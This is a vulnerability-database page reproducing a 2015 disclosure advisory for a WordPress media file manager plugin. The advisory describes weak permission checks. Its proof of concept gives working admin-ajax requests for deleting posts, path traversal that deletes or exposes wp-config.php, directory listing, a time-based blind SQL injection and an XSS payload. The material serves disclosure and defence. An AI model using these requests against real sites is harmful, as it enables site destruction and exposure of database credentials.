Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

🗓️ 14 May 2015 00:00:00Reported by EvexType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection allows unauthorized actions, including post manipulation, directory operations, and SQL injection. No fix available.

Code
`Description  
  
"media-file-manager-advanced" suffers from executing administrator actions  
by any authenticated user due to weak permissions checking.  
an attacker can delete/update posts, Creating/Removing/Listing Directories,  
Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site  
Scripting.  
  
Homepage  
  
https://wordpress.org/plugins/media-file-manager-advanced/  
  
Affected Version  
  
<= 1.1.5  
  
Description  
  
Vulnerability Scope  
  
  
LFD,SQL,XSS,Site Ruining and Changing of Content.  
  
Authorization Required  
  
User  
  
Proof of Concept  
  
  
Post Delete  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete  
post: id=17  
  
MKDIR  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir  
newdir=EVEXFOLDER  
  
folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER  
  
RMDIR (Dir Must Be Empty)  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir  
dir=EVEXFOLDER&name=  
  
not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER  
  
UNLINK  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete  
dir=../../&name=wp-config.php  
  
no more wp-config.php  
  
Blind SQL INJECTION  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen  
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)  
  
Sleeps for 10 seconds  
  
XSS  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen  
id="</button><script>alert(1)</script>  
  
Alerts(1)  
  
Update Post  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information  
id=34&title=New_Title&caption=bla&description=Dummy Description  
  
Move Files  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move  
dir_from=../../&items=wp-config.php&dir_to=  
  
now wp-config.php is in /wp-content/uploads/wp-config.php  
  
  
Renaming Files  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename  
dir=../../&from=wp-config.php&to=wp-config.txt  
  
now wp-config.php is renamed to wp-config.txt  
  
Directory Listing  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir  
dir=../../  
  
will list all files and directories  
  
Fix  
  
No Fix Available at The Moment.  
  
Time line  
  
Notified Vendor - No Reply  
Publish Disclosure  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 May 2015 00:00Current
1Low risk
Vulners AI Score1
wordpressmedia file managerxsssql injectionvulnerabilityunauthorized actionsdirectory operationsno fix
19